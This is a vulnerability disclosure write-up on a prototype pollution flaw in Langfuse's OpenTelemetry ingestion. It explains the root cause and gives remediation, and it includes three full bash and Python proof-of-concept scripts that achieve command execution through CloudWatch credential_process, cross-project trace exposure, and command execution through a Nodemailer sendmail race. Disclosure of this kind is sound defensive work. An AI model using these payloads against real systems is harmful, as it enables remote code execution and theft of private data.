Traces of RCE: Exploiting Langfuse Prototype Pollution

An authenticated OTel trace with a maliciously crafted attribute key can enable cross-project trace exposure and remote code execution.

AISafe Labs discovered an authenticated OpenTelemetry prototype pollution issue in Langfuse v3.167.4 that causes process-wide worker corruption. In the default single-worker deployment, it can cause cross-project private traces to be stored as public and read without authentication, and a worker-side notification race can turn the same primitive into remote code execution as the Langfuse worker user. CloudWatch metric publishing provides a second RCE trigger in deployments where it is enabled.

What Langfuse Is and How It Works

Langfuse is an open-source LLM engineering platform that helps teams build, monitor, and improve their AI applications. It covers the full development lifecycle with tracing, prompt management, evaluations, and analytics dashboards.

The platform is built around four core capabilities: Observability (Log traces, Lowest level transparency, Understand cost and latency), Prompt Management (Version control and deploy, Collaborate on prompts, Test prompts and models), Evaluation (Measure output quality, Monitor production health, Test changes in development), and Analytics. The vulnerability we discovered lives entirely within the Observability pillar, so that is where we will focus.

Observability

Observability is the foundation of Langfuse. It gives engineering teams visibility into every interaction inside an LLM application: every model call, retrieval step, tool invocation, and API request. Without it, debugging non-deterministic AI behaviour is essentially guesswork.

The core top-level unit of observability in Langfuse is the trace. A trace represents a single end-to-end request through an application. Each trace contains child observations, which may be ordinary spans or more specialized steps such as LLM generations, tool calls, retriever lookups, or custom operations. Together, these observations form a tree that shows how the request was processed, how long each step took, and what data flowed through it.

    export const ObservationSchema = z.object({
      id: z.string(),
      traceId: z.string().nullable(),
      projectId: z.string(),
      environment: z.string(),
      type: ObservationTypeDomain,
      startTime: z.date(),
      endTime: z.date().nullable(),
      name: z.string().nullable(),
      metadata: MetadataDomain,
      parentObservationId: z.string().nullable(),
      level: ObservationLevelDomain,
      statusMessage: z.string().nullable(),
      version: z.string().nullable(),
      createdAt: z.date(),
      updatedAt: z.date(),
      model: z.string().nullable(),
      internalModelId: z.string().nullable(),
      modelParameters: jsonSchema.nullable(),
      input: jsonSchema.nullable(),
      output: jsonSchema.nullable(),
      completionStartTime: z.date().nullable(),
      promptId: z.string().nullable(),
      promptName: z.string().nullable(),
      promptVersion: z.number().nullable(),
      latency: z.number().nullable(),
      timeToFirstToken: z.number().nullable(),
      usageDetails: z.record(z.string(), z.number()),
      costDetails: z.record(z.string(), z.number()),
      providedCostDetails: z.record(z.string(), z.number()),
      // aggregated data from cost_details
      inputCost: z.number().nullable(),
      outputCost: z.number().nullable(),
      totalCost: z.number().nullable(),
      // aggregated data from usage_details
      inputUsage: z.number(),
      outputUsage: z.number(),
      totalUsage: z.number(),
      // pricing tier information
      usagePricingTierId: z.string().nullable(),
      usagePricingTierName: z.string().nullable(),
      // tool data
      toolDefinitions: z.record(z.string(), z.string()).nullable(),
      toolCalls: z.array(z.string()).nullable(),
      toolCallNames: z.array(z.string()).nullable(),
    });

How Traces Are Ingested

Langfuse supports two ingestion paths:

- Native SDKs (Python / JavaScript): developers instrument their code directly using the Langfuse SDK, which sends structured trace data to the Langfuse API.

- OpenTelemetry (OTel): applications already instrumented with the OTel standard can send traces to Langfuse without any SDK dependency. This is the path relevant to our vulnerability.

When an application sends an OTel trace to Langfuse, the payload arrives at: POST /api/public/otel/v1/traces

    export default withMiddlewares({
      POST: createAuthedProjectAPIRoute({
        name: "OTel Traces",
        querySchema: z.any(),
        responseSchema: z.any(),
        rateLimitResource: "ingestion",
        fn: async ({ req, res, auth }) => {
          // Check if ingestion is suspended due to usage threshold
          if (auth.scope.isIngestionSuspended) {
            throw new ForbiddenError(
              "Ingestion suspended: Usage threshold exceeded. Please upgrade your plan.",
            );
          }
          // Mark project as using OTEL API
          await markProjectAsOtelUser(auth.scope.projectId);
          ...

Inside the Langfuse worker, the OtelIngestionProcessor is responsible for transforming this payload. OTel encodes structured data as flat, dotted attribute strings, for example, gen_ai.prompt.0.role represents the role field of the first prompt in a chat. The processor must expand these flat strings into nested JavaScript objects so Langfuse can render a proper chat history in its UI.

The vulnerability is in this dotted-key expansion step.
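To make the input to that step concrete, here is a minimal sketch of how flat OTLP/JSON attributes could be turned into path segments before expansion. The type names and the helpers unwrapValue and toPathEntries are hypothetical and exist only for illustration; they are not taken from the Langfuse codebase.

```typescript
// One OTLP/JSON attribute, reduced to the value kinds used in this post.
type OtelAnyValue = {
  stringValue?: string;
  boolValue?: boolean;
  intValue?: string | number;
  doubleValue?: number;
};

type OtelAttribute = { key: string; value: OtelAnyValue };

// Hypothetical helper: unwrap the typed OTLP value into a plain JS value.
function unwrapValue(v: OtelAnyValue): string | boolean | number | undefined {
  if (v.stringValue !== undefined) return v.stringValue;
  if (v.boolValue !== undefined) return v.boolValue;
  if (v.intValue !== undefined) return Number(v.intValue);
  return v.doubleValue;
}

// Hypothetical helper: split each dotted key into the segments that a
// nested-object builder would later walk.
function toPathEntries(
  attrs: OtelAttribute[],
): Array<{ path: string[]; value: unknown }> {
  return attrs.map((a) => ({
    path: a.key.split("."),
    value: unwrapValue(a.value),
  }));
}

const entries = toPathEntries([
  { key: "gen_ai.prompt.0.role", value: { stringValue: "user" } },
  { key: "gen_ai.prompt.__proto__.public", value: { boolValue: true } },
]);

// Every segment, including "__proto__", is entirely caller-controlled.
console.log(entries.map((e) => e.path.join(" > ")));
```

Nothing in this split distinguishes a data key from a language-level key, which is why the expansion step has to do that filtering itself.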

Vulnerability Analysis

The Vulnerable Code

When the OtelIngestionProcessor receives a span, it iterates over its flat OTel attributes and calls setNestedValue for each one, building up a nested JavaScript object from the dotted key path.

    const setNestedValue = (obj: any, path: string[], value: unknown): void => {
      let current = obj;
      for (let i = 0; i < path.length - 1; i++) {
        const key = path[i];
        if (!(key in current)) {
          current[key] = /^\d+$/.test(path[i + 1]) ? [] : {};
        }
        current = current[key]; // traverses into the next level
      }
      current[path[path.length - 1]] = value; // writes the final value
    };

The function walks each segment of the dotted key path, creating nested objects along the way, then writes the value at the final segment. With legitimate input this works exactly as intended, but it makes no attempt to validate or reject any segment of the path.

Legitimate input: gen_ai.prompt.0.role = "user" is split into ["gen_ai", "prompt", "0", "role"] and produces:

{ "gen_ai": { "prompt": [{ "role": "user" }] } }

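Malicious input: gen_ai.prompt.__proto__.polluted = "YES" is split into ["gen_ai", "prompt", "__proto__", "polluted"]. The in check reports that __proto__ already exists on the freshly created prompt object, so the function does not create anything and instead traverses into it. In JavaScript, __proto__ is not a regular key but an accessor for the object's prototype, which here is Object.prototype, so the final write lands directly on the shared prototype.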

This gives an attacker the ability to set arbitrary properties, with arbitrary values, on Object.prototype using nothing more than a crafted OTel attribute key in a trace payload.
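The behaviour described above can be reproduced in isolation. The sketch below copies setNestedValue as shown in this post and runs it on one legitimate and one malicious key; the variable names are illustrative, and the final delete is only there so the demo does not leave the process polluted.

```typescript
// Copied from the vulnerable function shown above.
const setNestedValue = (obj: any, path: string[], value: unknown): void => {
  let current = obj;
  for (let i = 0; i < path.length - 1; i++) {
    const key = path[i];
    if (!(key in current)) {
      current[key] = /^\d+$/.test(path[i + 1]) ? [] : {};
    }
    current = current[key];
  }
  current[path[path.length - 1]] = value;
};

// Legitimate key: builds a nested structure on the target object only.
const legit: Record<string, unknown> = {};
setNestedValue(legit, "gen_ai.prompt.0.role".split("."), "user");

// Malicious key: "__proto__" passes the `in` check, so the loop walks into
// Object.prototype and the final assignment lands there.
const evil: Record<string, unknown> = {};
setNestedValue(evil, "gen_ai.prompt.__proto__.polluted".split("."), "YES");

// An unrelated object created afterwards now inherits the attacker's value.
const probe: Record<string, unknown> = {};
const leaked = probe.polluted;

// Clean up so the demo does not affect the rest of the process.
delete (Object.prototype as any).polluted;
const afterCleanup = ({} as Record<string, unknown>).polluted;

console.log(JSON.stringify(legit), leaked, afterCleanup);
```

Note that the target of the write depends on what the segment before __proto__ resolves to. If prompt had already been created as an array by an earlier attribute, the same key would reach Array.prototype instead.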

What is Prototype Pollution?

In JavaScript, almost every object implicitly inherits from Object.prototype. Any property set on that shared prototype immediately appears on every object in the process that does not define that property itself. This behaviour is by design, since it is how inheritance works, but it turns into a critical vulnerability when attacker-controlled input reaches code that writes to the prototype.

Example:

    // Normal: each object has its own properties
    const a = {};
    const b = {};
    console.log(a.admin); // undefined

    // After prototype pollution:
    Object.prototype.admin = true;
    console.log(a.admin);  // true ← a never defined this
    console.log(b.admin);  // true ← neither did b
    console.log({}.admin); // true ← any new object too

The pollution persists for the lifetime of the process. Every piece of code that later reads a property from any object, even an empty one, will see the injected value unless that object defines the property itself.

In the Langfuse worker this means a single authenticated OTel request poisons the entire process. Later ingestion jobs in that worker read from the polluted prototype until the process restarts.
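The difference between an inherited read and an own-property check is what separates affected code from unaffected code. The following sketch illustrates it; enumerablePrototypeKeys and isOwn are hypothetical helper names, and the admin key simply mirrors the example above.

```typescript
// Hypothetical canary: a clean Object.prototype normally has no enumerable
// keys, so anything listed here was added at runtime.
function enumerablePrototypeKeys(): string[] {
  return Object.keys(Object.prototype);
}

// Own-property check that ignores the prototype chain.
function isOwn(target: object, key: string): boolean {
  return Object.prototype.hasOwnProperty.call(target, key);
}

const keysBefore = enumerablePrototypeKeys();

// Simulate the pollution (assumed key name: "admin").
(Object.prototype as any).admin = true;

const job: Record<string, unknown> = { id: "job-1" };
const inheritedRead = job.admin;      // resolved through the prototype chain
const ownCheck = isOwn(job, "admin"); // job itself never defined the key
const keysDuring = enumerablePrototypeKeys();

// for...in also visits inherited enumerable keys, after the own ones.
const seenByForIn: string[] = [];
for (const k in job) seenByForIn.push(k);

// Clean up so the demo does not affect the rest of the process.
delete (Object.prototype as any).admin;
const keysAfter = enumerablePrototypeKeys();

console.log({ keysBefore, keysDuring, keysAfter, inheritedRead, ownCheck, seenByForIn });
```

Plain property reads and for...in loops observe the injected key, while hasOwnProperty does not. Code that only ever uses own-property checks on untrusted-shaped objects is therefore not a usable gadget.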

Case Study 1: Remote Code Execution via CloudWatch

The most severe impact occurs in deployments where CloudWatch metric publishing is enabled (ENABLE_AWS_CLOUDWATCH_METRIC_PUBLISHING=true).

The Chain

The attacker begins with an authenticated HTTP request to POST /api/public/otel/v1/traces using credentials for any valid Langfuse project on the target instance. The payload is a well-formed OTel trace with crafted span attributes such as gen_ai.prompt.__proto__.profile = "pwn" and gen_ai.prompt.__proto__.pwn.credential_process = "<command>". When the worker processes this span, Langfuse's dotted-key expansion logic traverses through __proto__ and writes attacker-controlled properties onto Object.prototype for the lifetime of that worker process.

Code execution is not immediate. In deployments with ENABLE_AWS_CLOUDWATCH_METRIC_PUBLISHING=true, Langfuse periodically flushes metrics through the AWS SDK CloudWatch client. During default credential resolution, the SDK can consume the inherited profile value and resolve the inherited profile object containing credential_process. It then executes the attacker-controlled command as a subprocess and parses its stdout as credential JSON.

The result is command execution as the Langfuse worker OS user. In testing, the command wrote a marker file and the output of id inside the worker container; CloudWatch then rejected the fake credentials with an invalid token error. This chain requires a valid project ingestion API key, a CloudWatch-enabled worker, and execution of the trigger path in the same live worker process.
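The gadget pattern behind this chain can be modeled in a few lines. The sketch below is a deliberately simplified stand-in and is not AWS SDK code: the types and both functions are hypothetical, and no command is executed. It only shows how two inherited properties are enough to make an empty configuration resolve to an attacker-chosen command string.

```typescript
// Hypothetical, simplified model of a profile-based credential lookup.
type Profile = { credential_process?: string };
type ProfileMap = Record<string, Profile | undefined>;
type ClientInit = { profile?: string };

// Naive lookup: plain property reads follow the prototype chain.
function naiveCredentialCommand(
  init: ClientInit,
  profiles: ProfileMap,
): string | undefined {
  const profileName = init.profile ?? "default";
  return profiles[profileName]?.credential_process;
}

// Illustrative hardening: only own properties are ever consulted.
function ownOnlyCredentialCommand(
  init: ClientInit,
  profiles: ProfileMap,
): string | undefined {
  const has = (o: object, k: string): boolean =>
    Object.prototype.hasOwnProperty.call(o, k);
  const profileName =
    has(init, "profile") && init.profile !== undefined ? init.profile : "default";
  if (!has(profiles, profileName)) return undefined;
  const p = profiles[profileName];
  return p !== undefined && has(p, "credential_process")
    ? p.credential_process
    : undefined;
}

const cleanResult = naiveCredentialCommand({}, {});

// Same shape as the two attributes in the chain: a profile name and a
// profile object carrying credential_process.
(Object.prototype as any).profile = "pwn";
(Object.prototype as any).pwn = { credential_process: "echo attacker-command" };

const pollutedResult = naiveCredentialCommand({}, {});
const hardenedResult = ownOnlyCredentialCommand({}, {});

// Clean up so the demo does not affect the rest of the process.
delete (Object.prototype as any).profile;
delete (Object.prototype as any).pwn;

console.log({ cleanResult, pollutedResult, hardenedResult });
```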

PoC

The following script pollutes the worker and triggers a command that writes the output of id to a file inside the worker container.

    #!/usr/bin/env bash
    set -euo pipefail

    BASE_URL="${BASE_URL:-http://localhost:3000}"
    PUBLIC_KEY="${PUBLIC_KEY:-pk-lf-crossproj-a-1111}"
    SECRET_KEY="${SECRET_KEY:-sk-lf-crossproj-a-1111}"
    OUT="/tmp/langfuse_cw_rce_clean_payload.json"

    python3 - "$OUT" <<'PY'
    import json
    import sys
    import time

    out = sys.argv[1]
    now = int(time.time() * 1_000_000_000)

    cmd = (
        "sh -c 'id > /tmp/langfuse_poc_new; "
        "touch /tmp/langfuse_poc_new_marker; "
        "printf \"{\\\"Version\\\":1,"
        "\\\"AccessKeyId\\\":\\\"AKIAFAKEKEY123456\\\","
        "\\\"SecretAccessKey\\\":\\\"FAKESECRETKEY1234567890\\\"}\"'"
    )

    payload = {
        "resourceSpans": [
            {
                "resource": {"attributes": []},
                "scopeSpans": [
                    {
                        "scope": {
                            "name": "evil-scope",
                            "version": "1.0.0",
                            "attributes": [],
                        },
                        "spans": [
                            {
                                "traceId": "71717171717171717171717171717171",
                                "spanId": "8282828282828282",
                                "name": "cloudwatch-rce-clean-full-http",
                                "kind": 1,
                                "startTimeUnixNano": now,
                                "endTimeUnixNano": now + 1_000_000,
                                "attributes": [
                                    {
                                        "key": "gen_ai.prompt.__proto__.profile",
                                        "value": {"stringValue": "pwn"},
                                    },
                                    {
                                        "key": "gen_ai.prompt.__proto__.pwn.credential_process",
                                        "value": {"stringValue": cmd},
                                    },
                                    {
                                        "key": "other.attr",
                                        "value": {"stringValue": "hello"},
                                    },
                                ],
                                "events": [],
                            }
                        ],
                    }
                ],
            }
        ]
    }

    with open(out, "w", encoding="utf-8") as f:
        json.dump(payload, f)
    print(out)
    PY

    echo "[1] Poison worker via authenticated OTel for CloudWatch RCE"
    curl -sS -w '\nHTTP %{http_code}\n' \
      -u "${PUBLIC_KEY}:${SECRET_KEY}" \
      -H 'Content-Type: application/json' \
      --data-binary "@${OUT}" \
      "${BASE_URL}/api/public/otel/v1/traces"

    # CloudWatch flush happens every 30 seconds by default
    echo "[2] Wait for the worker to process the poison job and trigger CloudWatch flush"
    sleep 40

    echo "[3] Verify inside the worker container"
    docker exec langfuse-cw-worker sh -lc 'ls -l /tmp/langfuse_poc_new_marker /tmp/langfuse_poc_new; cat /tmp/langfuse_poc_new'

Case Study 2: Cross-Project Trace Exposure

This chain requires no optional integrations and works against default single-worker Langfuse deployments. It uses the prototype pollution primitive to break multi-tenant isolation between projects sharing a worker process.

The Chain

The attacker starts with an authenticated OTel request carrying a crafted attribute such as gen_ai.prompt.__proto__.public = true. When Langfuse's dotted-key expansion logic processes this key, it traverses through __proto__ and writes public = true onto Object.prototype for the lifetime of the worker process. The request can still be accepted at the HTTP layer, while the worker remains in a polluted state for later jobs.

The sink is in the ingestion path that maps trace-create events into stored trace records. In the vulnerable flow, Langfuse resolves trace visibility using logic equivalent to public: trace.body.public ?? false. The intended behavior is straightforward: if the caller explicitly sets public: true, preserve it; otherwise default to false and keep the trace private. That assumption fails once the worker's global prototype has been polluted.

After pollution, a victim in a separate project can send a normal private trace with no own public field in the payload. The worker builds a plain JavaScript object for that trace body, and property access on trace.body.public walks the prototype chain. Instead of undefined, it resolves to the inherited value true from Object.prototype. Because ?? only falls back on null or undefined, the default false is never applied. The victim trace is then stored as public.

Once Langfuse stores a victim trace with public = true, the unauthenticated public trace read path returns it. In the default deployment test, one project's ingestion API key exposed another project's private trace data. In a shared or multi-tenant deployment, any later victim trace processed by the same polluted worker process and lacking an own public field may be exposed this way until the worker is restarted or replaced.
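The failure of the ?? fallback is easy to reproduce. In the sketch below, vulnerableVisibility mirrors the logic quoted above (public: trace.body.public ?? false), while ownPropertyVisibility is one possible hardening written for this illustration and is not the Langfuse fix. The TraceBody type is likewise an assumption.

```typescript
// Assumed minimal shape of a trace-create body.
type TraceBody = { id: string; name?: string; public?: boolean };

// Equivalent to the logic described above: falls back only on null/undefined.
const vulnerableVisibility = (body: TraceBody): boolean => body.public ?? false;

// Illustrative alternative: trust the flag only if the payload itself set it.
const ownPropertyVisibility = (body: TraceBody): boolean =>
  Object.prototype.hasOwnProperty.call(body, "public") && body.public === true;

// A victim payload with no public field of its own.
const victim: TraceBody = { id: "trace-1", name: "victim-private" };

const visibilityBefore = vulnerableVisibility(victim);

// Simulate the attacker's earlier OTel request.
(Object.prototype as any).public = true;

const visibilityAfter = vulnerableVisibility(victim);
const visibilityOwnOnly = ownPropertyVisibility(victim);

// Clean up so the demo does not affect the rest of the process.
delete (Object.prototype as any).public;

console.log({ visibilityBefore, visibilityAfter, visibilityOwnOnly });
```

The victim object is identical in both calls. Only the state of the shared prototype changed, which is why the exposure affects every later trace in the same process rather than one specific request.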

PoC

    #!/usr/bin/env bash
    set -euo pipefail

    BASE_URL="${BASE_URL:-http://localhost:3000}"
    ATTACKER_PUBLIC_KEY="${ATTACKER_PUBLIC_KEY:-pk-lf-crossproj-a-1111}"
    ATTACKER_SECRET_KEY="${ATTACKER_SECRET_KEY:-sk-lf-crossproj-a-1111}"
    VICTIM_PUBLIC_KEY="${VICTIM_PUBLIC_KEY:-pk-lf-crossproj-b-2222}"
    VICTIM_SECRET_KEY="${VICTIM_SECRET_KEY:-sk-lf-crossproj-b-2222}"
    VICTIM_PROJECT_ID="${VICTIM_PROJECT_ID:-88888888-8888-8888-8888-888888888888}"
    POISON_PAYLOAD="/tmp/langfuse_public_poison_payload.json"
    VICTIM_PAYLOAD="/tmp/langfuse_public_victim_ingestion.json"
    TRACE_ID=$(uuidgen)

    python3 - "$POISON_PAYLOAD" "$VICTIM_PAYLOAD" "$TRACE_ID" <<'PY'
    import json
    import sys
    import time
    import uuid

    poison_out, victim_out, trace_id = sys.argv[1:4]
    now = int(time.time() * 1_000_000_000)

    poison = {
        "resourceSpans": [
            {
                "resource": {"attributes": []},
                "scopeSpans": [
                    {
                        "scope": {
                            "name": "evil-scope",
                            "version": "1.0.0",
                            "attributes": [],
                        },
                        "spans": [
                            {
                                "traceId": "c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3",
                                "spanId": "c3c3c3c3c3c3c3c3",
                                "name": "poison-public-proto",
                                "kind": 1,
                                "startTimeUnixNano": now,
                                "endTimeUnixNano": now + 1_000_000,
                                "attributes": [
                                    {
                                        "key": "gen_ai.prompt.__proto__.public",
                                        "value": {"boolValue": True},
                                    },
                                    {
                                        "key": "other.attr",
                                        "value": {"stringValue": "poison"},
                                    },
                                ],
                                "events": [],
                            }
                        ],
                    }
                ],
            }
        ]
    }

    victim = {
        "batch": [
            {
                "id": str(uuid.uuid4()),
                "timestamp": time.strftime("%Y-%m-%dT%H:%M:%S.000Z", time.gmtime()),
                "type": "trace-create",
                "body": {
                    "id": trace_id,
                    "name": "victim-private-regular-ingestion",
                    "metadata": {"secret": "victim-data-no-public-field"},
                },
            }
        ]
    }

    with open(poison_out, "w", encoding="utf-8") as f:
        json.dump(poison, f)
    with open(victim_out, "w", encoding="utf-8") as f:
        json.dump(victim, f)
    PY

    echo "[1] Poison worker Object.prototype.public via authenticated OTel"
    curl -sS -w '\nHTTP %{http_code}\n' \
      -u "${ATTACKER_PUBLIC_KEY}:${ATTACKER_SECRET_KEY}" \
      -H 'Content-Type: application/json' \
      --data-binary "@${POISON_PAYLOAD}" \
      "${BASE_URL}/api/public/otel/v1/traces"

    echo "[2] Wait for the worker to process the poison job"
    sleep "${POISON_WAIT_SECONDS:-6}"

    echo "[3] Victim sends a normal private trace with no public field"
    curl -sS -w '\nHTTP %{http_code}\n' \
      -u "${VICTIM_PUBLIC_KEY}:${VICTIM_SECRET_KEY}" \
      -H 'Content-Type: application/json' \
      --data-binary "@${VICTIM_PAYLOAD}" \
      "${BASE_URL}/api/public/ingestion"

    echo "[4] Wait for ingestion worker write"
    sleep "${INGESTION_WAIT_SECONDS:-10}"

    INPUT=$(python3 - "$VICTIM_PROJECT_ID" "$TRACE_ID" <<'PY'
    import json
    import sys
    import urllib.parse

    project_id, trace_id = sys.argv[1:3]
    print(urllib.parse.quote(json.dumps({"json": {"projectId": project_id, "traceId": trace_id}})))
    PY
    )

    # Expected after pollution: HTTP 200 and public=true
    echo "[5] Unauthenticated trace read"
    curl -sS -i "${BASE_URL}/api/trpc/traces.byId?input=${INPUT}" | head -n 30

Case Study 3: Remote Code Execution via a Notification Worker Race

The first Nodemailer result was only a helper-level gadget: if Langfuse reached an email helper after Object.prototype.EMAIL_FROM_ADDRESS and Object.prototype.SMTP_CONNECTION_URL had already been polluted, Nodemailer could be pushed into its sendmail transport and spawn /bin/sh. That is not enough for a real Langfuse exploit. In practice, polluting first causes unrelated Prisma and Zod work in the notification path to trip over the new enumerable inherited properties before the code reaches sendCommentMentionEmail().

The working chain is a race inside the actual Langfuse worker process. The attacker starts many comment-mention notification jobs over HTTP, then sends the authenticated OTel poison request while those jobs are already past the Prisma reads and awaiting the observation lookup. One notification resumes after the worker has been polluted, reads the inherited email settings, and reaches Nodemailer in the same process.

The Chain

- A logged-in project member creates many comments.create requests that mention a user on an OBSERVATION. This enqueues NotificationJob items through the normal HTTP API.

- Those notification jobs run in the Langfuse worker. For observation comments, handleCommentMentionNotification() builds the comment link and awaits ClickHouse via getObservationById().

- While those jobs are paused on that await, the attacker sends POST /api/public/otel/v1/traces with OTel attributes that set:
  gen_ai.prompt.__proto__.EMAIL_FROM_ADDRESS = "[email protected]"
  gen_ai.prompt.__proto__.SMTP_CONNECTION_URL = "smtp://localhost?sendmail=true&path=/bin/sh&args=-c&args=..."

- The OTel ingestion job pollutes Object.prototype in the same worker process.

- A pending notification job resumes, reaches sendCommentMentionEmail(), and reads the inherited email configuration from Langfuse's parsed env object.

- parseConnectionUrl() converts the SMTP URL query string into own Nodemailer transport options: sendmail=true, path=/bin/sh, and repeated args values.

- sendMail() then spawns the command as the Langfuse worker user.

The timing matters. The notification job has to cross the database-heavy part of the handler before pollution lands; otherwise the inherited keys can break Prisma/Zod validation before the email sink is reachable.
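The URL-to-options step in the chain above can be modeled with a small parser. This is a sketch under stated assumptions: parseQueryOptions is a hypothetical stand-in, not Nodemailer's parseConnectionUrl, and it keeps every value as a string whereas the real parser may coerce types. It only illustrates how repeated args parameters become an argument list alongside path.

```typescript
type TransportOptions = Record<string, string | string[]>;

// Hypothetical stand-in for a connection-URL parser: every query parameter
// becomes an own option, and repeated parameters are collected into an array.
function parseQueryOptions(connectionUrl: string): TransportOptions {
  const options: TransportOptions = Object.create(null);
  const q = connectionUrl.indexOf("?");
  const query = q === -1 ? "" : connectionUrl.slice(q + 1);
  for (const pair of query.split("&")) {
    if (pair === "") continue;
    const eq = pair.indexOf("=");
    const key = decodeURIComponent(eq === -1 ? pair : pair.slice(0, eq));
    const value = eq === -1 ? "" : decodeURIComponent(pair.slice(eq + 1));
    const existing = options[key];
    if (existing === undefined) {
      options[key] = value;
    } else if (Array.isArray(existing)) {
      existing.push(value);
    } else {
      options[key] = [existing, value];
    }
  }
  return options;
}

// Harmless placeholder command, URL-encoded the same way the PoC encodes it.
const shellCommand = "id > /tmp/marker";
const smtpUrl =
  "smtp://localhost?sendmail=true&path=/bin/sh&args=-c&args=" +
  encodeURIComponent(shellCommand);

const parsedOptions = parseQueryOptions(smtpUrl);
console.log(parsedOptions.sendmail, parsedOptions.path, parsedOptions.args);
```

Once options of this shape reach a transport that spawns path with args, the string that started as an inherited configuration value has become a process invocation.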

PoC

This PoC uses only Langfuse's HTTP surfaces for the trigger: authenticated web session requests enqueue the comment notifications, and the public OTel ingestion endpoint delivers the prototype pollution payload.

    #!/usr/bin/env bash
    set -euo pipefail

    BASE_URL="${BASE_URL:-http://localhost:3000}"
    EMAIL="${EMAIL:-[email protected]}"
    PASSWORD="${PASSWORD:?set PASSWORD}"
    PUBLIC_KEY="${PUBLIC_KEY:-pk-lf-...}"
    SECRET_KEY="${SECRET_KEY:-sk-lf-...}"
    PROJECT_ID="${PROJECT_ID:-project-proto-poc}"
    USER_ID="${USER_ID:-cmobeoxpb0002o707eekhejsi}"
    OBSERVATION_ID="${OBSERVATION_ID:-2222222222222222}"
    COUNT="${COUNT:-80}"
    DELAY_MS="${DELAY_MS:-0}"
    MARKER="${MARKER:-/tmp/langfuse_nodemailer_full_http_race_marker}"

    COOKIE_JAR="$(mktemp)"
    CSRF_JSON="$(mktemp)"
    POISON_PAYLOAD="$(mktemp)"
    BODY_DIR="$(mktemp -d)"

    cleanup() {
      rm -f "$COOKIE_JAR" "$CSRF_JSON" "$POISON_PAYLOAD"
      rm -rf "$BODY_DIR"
    }
    trap cleanup EXIT

    python3 - "$POISON_PAYLOAD" "$MARKER" <<'PY'
    import json
    import sys
    import time
    import urllib.parse

    out, marker = sys.argv[1:3]
    now = int(time.time() * 1_000_000_000)

    cmd = f"id > {marker}.id; touch {marker}; exit 0"
    smtp_url = (
        "smtp://localhost?sendmail=true&path=/bin/sh&args=-c&args="
        + urllib.parse.quote(cmd)
    )

    payload = {
        "resourceSpans": [
            {
                "resource": {"attributes": []},
                "scopeSpans": [
                    {
                        "scope": {
                            "name": "full-http-race",
                            "version": "1",
                            "attributes": [],
                        },
                        "spans": [
                            {
                                "traceId": "b9b9b9b9b9b9b9b9b9b9b9b9b9b9b9b9",
                                "spanId": "b9b9b9b9b9b9b9b9",
                                "name": "poison-email-env-full-http-race",
                                "kind": 1,
                                "startTimeUnixNano": now,
                                "endTimeUnixNano": now + 1_000_000,
                                "attributes": [
                                    {
                                        "key": "gen_ai.prompt.__proto__.EMAIL_FROM_ADDRESS",
                                        "value": {"stringValue": "[email protected]"},
                                    },
                                    {
                                        "key": "gen_ai.prompt.__proto__.SMTP_CONNECTION_URL",
                                        "value": {"stringValue": smtp_url},
                                    },
                                ],
                                "events": [],
                            }
                        ],
                    }
                ],
            }
        ]
    }

    with open(out, "w", encoding="utf-8") as f:
        json.dump(payload, f)
    PY

    curl -sS -c "$COOKIE_JAR" "$BASE_URL/api/auth/csrf" >"$CSRF_JSON"
    CSRF_TOKEN="$(python3 -c 'import json,sys; print(json.load(open(sys.argv[1]))["csrfToken"])' "$CSRF_JSON")"

    curl -sS -b "$COOKIE_JAR" -c "$COOKIE_JAR" \
      -X POST "$BASE_URL/api/auth/callback/credentials" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      --data-urlencode "csrfToken=$CSRF_TOKEN" \
      --data-urlencode "email=$EMAIL" \
      --data-urlencode "password=$PASSWORD" \
      --data-urlencode "json=true" >/dev/null

    echo "[1] Start many HTTP comment-create requests to enqueue notification jobs"
    for i in $(seq 0 $((COUNT - 1))); do
      body="$BODY_DIR/comment-$i.json"
      python3 - "$body" "$PROJECT_ID" "$USER_ID" "$OBSERVATION_ID" <<'PY'
    import json
    import sys

    out, project_id, user_id, observation_id = sys.argv[1:5]
    body = {
        "0": {
            "json": {
                "projectId": project_id,
                "content": f"hello @[POC User](user:{user_id})",
                "objectId": observation_id,
                "objectType": "OBSERVATION",
            }
        }
    }
    with open(out, "w", encoding="utf-8") as f:
        json.dump(body, f)
    PY
      curl -sS -b "$COOKIE_JAR" \
        -H "Content-Type: application/json" \
        -X POST "$BASE_URL/api/trpc/comments.create?batch=1" \
        --data-binary "@$body" >/dev/null &
    done

    python3 - "$DELAY_MS" <<'PY'
    import sys
    import time

    time.sleep(int(sys.argv[1]) / 1000)
    PY

    echo "[2] Send authenticated OTel prototype pollution payload over HTTP"
    curl -sS -w '\nHTTP %{http_code}\n' \
      -u "$PUBLIC_KEY:$SECRET_KEY" \
      -H "Content-Type: application/json" \
      --data-binary "@$POISON_PAYLOAD" \
      "$BASE_URL/api/public/otel/v1/traces"

    wait || true

    cat <<EOF
    [3] Check the worker container for:
      $MARKER
      $MARKER.id

    The marker id file should contain the uid of the Langfuse worker process.
    EOF

In the validated run, the marker showed execution as the Langfuse worker container user:

uid=1001(expressjs) gid=65533(nogroup)

Remediation



The fix implemented in Langfuse addresses the vulnerability at three levels (see PR #13201):

- Segment Blocklist: Any path segment that is __proto__, constructor, or prototype is rejected during expansion.

- Strict Own-Property Checks: The traversal logic now uses Object.prototype.hasOwnProperty.call(current, key) to ensure it never interacts with inherited properties.

- Prototype Hardening: While the primary fix is key filtering, downstream sinks are being audited to use null-prototype objects (Object.create(null)) for attacker-influenced data.
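The effect of a null-prototype object can be shown in a few lines. This is an illustrative sketch with made-up variable names, not code from the Langfuse patch.

```typescript
// A regular object literal inherits from Object.prototype.
const plain: Record<string, unknown> = {};

// A null-prototype object has no prototype chain to consult at all.
const bare: Record<string, unknown> = Object.create(null);

// Simulate a polluted process.
(Object.prototype as any).public = true;

const plainSees = plain.public;    // inherited from the polluted prototype
const bareSees = bare.public;      // nothing to inherit from
const bareHasKey = "public" in bare;

// Clean up so the demo does not affect the rest of the process.
delete (Object.prototype as any).public;

console.log({ plainSees, bareSees, bareHasKey });
```

The trade-off is that null-prototype objects also lack inherited helpers such as toString and hasOwnProperty, so code that receives them has to call those through Object.prototype explicitly.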

Fixed Code Pattern

    const key = path[i];
    if (key === "__proto__" || key === "prototype" || key === "constructor") {
      return; // Stop expansion
    }
    if (!Object.prototype.hasOwnProperty.call(current, key)) {
      current[key] = {};
    }
